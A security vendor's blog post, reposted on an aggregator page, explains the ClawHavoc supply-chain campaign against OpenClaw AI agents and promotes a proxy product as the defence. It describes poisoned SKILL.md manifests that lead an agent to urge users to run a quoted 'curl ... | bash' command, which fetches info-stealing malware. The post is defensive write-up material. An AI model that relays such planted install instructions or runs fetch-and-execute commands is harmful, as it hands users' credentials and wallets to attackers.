惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

酷 壳 – CoolShell
酷 壳 – CoolShell
雷峰网
雷峰网
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Spread Privacy
Spread Privacy
H
Hacker News: Front Page
PCI Perspectives
PCI Perspectives
Webroot Blog
Webroot Blog
罗磊的独立博客
H
Heimdal Security Blog
TaoSecurity Blog
TaoSecurity Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
大猫的无限游戏
大猫的无限游戏
月光博客
月光博客
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Google Online Security Blog
Google Online Security Blog
Last Week in AI
Last Week in AI
美团技术团队
Help Net Security
Help Net Security
The Hacker News
The Hacker News
C
Cisco Blogs
T
The Blog of Author Tim Ferriss
J
Java Code Geeks
The Register - Security
The Register - Security
IT之家
IT之家
WordPress大学
WordPress大学
Jina AI
Jina AI
Recent Commits to openclaw:main
Recent Commits to openclaw:main
H
Help Net Security
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Threat Research - Cisco Blogs
P
Proofpoint News Feed
NISL@THU
NISL@THU
爱范儿
爱范儿
The GitHub Blog
The GitHub Blog
Scott Helme
Scott Helme
V
Vulnerabilities – Threatpost
B
Blog
T
Tenable Blog
博客园 - 三生石上(FineUI控件)
T
The Exploit Database - CXSecurity.com
S
Security Affairs
小众软件
小众软件
Hacker News: Ask HN
Hacker News: Ask HN
Security Latest
Security Latest
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
W
WeLiveSecurity
A
Arctic Wolf
L
LINUX DO - 热门话题
Google DeepMind News
Google DeepMind News
M
MIT News - Artificial intelligence

Aryaka

Secure SD‑WAN And Unified SASE: What AI‑Driven Enterprises Need To Know Before Leaving MPLS How Unified SASE Improves China Connectivity: Performance, Security, And Compliance | Aryaka Blog Why China Connectivity Remains A Major Enterprise Challenge For Global IT Teams | Aryaka Blog The Market Has Spoken (Twice): Why Enterprises Choose Aryaka For SD‑WAN And Unified SASE AI Performance Is A Network Problem, Not Just Compute From ZIP File To Crpx0 Ransomware: Anatomy Of A Multi-Stage Attack Aryaka AI-Ready Network: Why Your WAN Fails For AI Workloads AI Is Redefining Cybersecurity: How CISOs Can Stay Ahead In An AI‑Driven Threat Landscape | Aryaka Blog Aryaka Named Leader In G2 Spring 2026 For SD-WAN & Cloud Security Governing Tens Of Thousands Of AI Agents: Why Policy Chaining Matters For Scalable Runtime Governance | Aryaka Blog Enterprise AI Agent Governance: Build, Deployment & Runtime Explained Is Your Outdated Network Holding Your Business Back? Why Modernization Matters For Cloud, Security, And IT Costs | Aryaka Blog Kernel In The Crosshairs: How The BlackSanta EDR-Killer Campaign Targets Recruitment Workflows | Aryaka Blog Addressing The “God Key” Challenge In Agentic AI For MCP Servers: Why You Need MCP-Aware, AI-Aware ZTNA | Why Browser Security Alone Will Not Protect Us In The Agentic AI Era Aryaka Modern Workplaces Need A New Meaning Of “Site”: How AI>Secure Uses Logical & Physical Sites For Consistent GenAI Security | Aryaka Blog How Modern Security Platforms Organize Rules | SASE & SSE Securing OpenClaw: Why ZTNA Is Critical For Enterprise AI Agent Authentication
Securing OpenClaw Agents From ClawHavoc Supply-Chain Attacks With AI-Driven Protection
2026-02-18 · via Aryaka

Blog 2 Securing OpenClaw Against Banner

As of February 2026, OpenClaw (formerly Clawdbot and Moltbot ) is a popular platform for autonomous AI agents. Its “sovereign” architecture, which gives AI direct access to file systems and terminals, significantly increases its attack surface—leading to elevated risks, most notably illustrated by the ClawHavoc supply-chain campaign, which exposed thousands of deployments to potential compromise.

This article reviews OpenClaw’s vulnerabilities and explains how Aryaka AI>Secure provides robust, multi-layered risk mitigation.

OpenClaw Vulnerabilities & The ClawHavoc Context

OpenClaw is vulnerable due to three main factors:

  • System-Level Access: Agents can execute shell commands and access credentials.
  • Untrusted Ingestion: Agents process third-party content, exposing them to prompt injection.
  • Autonomous Communication: Agents can send data externally without supervision.

ClawHavoc is a supply-chain attack that exploited this ecosystem. In February 2026, researchers discovered about 12% of ClawHub skills were malicious, disguised as useful tools but actually stealing digital identities.

How ClawHavoc Works: The Anatomy of an Infection

ClawHavoc is a stateful, social-engineering attack that exploits the way OpenClaw ingests instructions. It follows a repeatable, highly effective kill chain:

  • Step 1: The Poisoned Manifest (SKILL.md): Attackers upload a skill to ClawHub. The core of the attack is the SKILL.md file. It includes a “Prerequisites” section that tells the agent (and the user) that a specific script must be run to “initialize” the tool.
  • Step 2: Social Engineering via LLM: When you ask your agent to use the skill, it reads the malicious SKILL.md into its context. The LLM then generates a helpful-sounding response: “To enable this feature, please run this command in your terminal: curl -sL https://glot.io/raw/snippet | bash.”
  • Step 3: Malware Payload Delivery: If the user executes the command, it downloads a second-stage payload—typically Atomic Stealer (AMOS) or a keylogger. This malware raids browser cookies, keychains, and the OpenClaw environment files for API keys and crypto wallets.

Using Aryaka AI>Secure to Stop ClawHavoc

As a deep-packet, AI-aware MITM proxy, Aryaka AI>Secure intercepts traffic at every stage of the ClawHavoc attack chain.

Method 1: Blocking the Malicious Skill Download

When a user runs clawhub install, AI>Secure decrypts the HTTPS traffic from the registry.

  • The Protection: It doesn’t just see a file; it parses the Markdown content of the SKILL.md. It uses semantic inspection to identify “Toxic Instructions,” such as hidden shell commands or links to known snippet-sharing sites used in the ClawHavoc campaign.
  • The Result: It blocks the download at the network edge, preventing the malicious instructions from ever reaching the agent’s memory.

Method 2: Response Semantic Filtering (Instruction Defense)

If a bad skill is already on your machine, AI>Secure provides a second layer of defense by inspecting the LLM’s output.

  • The Protection: When the LLM tells the user to “Run this script to enable the tool,” AI>Secure’s semantic engine recognizes this as “Installer Fraud.” It identifies that the AI is being manipulated into tricking a human into a dangerous action.
  • The Result: The proxy redacts the command from the chat stream or blocks the message entirely, replacing it with a security warning in the user’s interface.

Method 3: Proactive URL Filtering & SWG (Payload Defense)

If the user attempts to manually run a malicious curl command or download a “prerequisite” ZIP, AI>Secure’s Secure Web Gateway (SWG) functionality intervenes.

  • The Protection: AI>Secure utilizes a real-time URL Intelligence Feed to track phishing domains and malware-hosting infrastructure.
  • The Result: When the agent or user tries to reach the specific URL hosting the malware payload (like glot.io or webhook.site), the proxy identifies the destination as “Malicious” or “High-Risk” and kills the request instantly. This prevents the actual malware from ever being fetched.

Method 4: Runtime Tool & Data Lockdown

If the malware manages to execute, AI>Secure acts as the final gatekeeper for your data.

  • The Protection: It understands the MCP (Model Context Protocol) calls. If an infected agent tries to execute a shell command to exfiltrate data, AI>Secure identifies the anomalous destination.
  • The Result: Its Next-Gen DLP (Data Loss Prevention) scans all outbound data for “Secrets” (API keys, SSH headers). If it sees your private credentials leaving the network, it terminates the session and alerts the security team.

Conclusion

The ClawHavoc crisis proves that for autonomous agents, the prompt and the skill manifest are the new perimeters. By leveraging an AI-centric proxy like Aryaka AI>Secure, you ensure that your OpenClaw agent remains a tool for productivity rather than a gateway for attackers.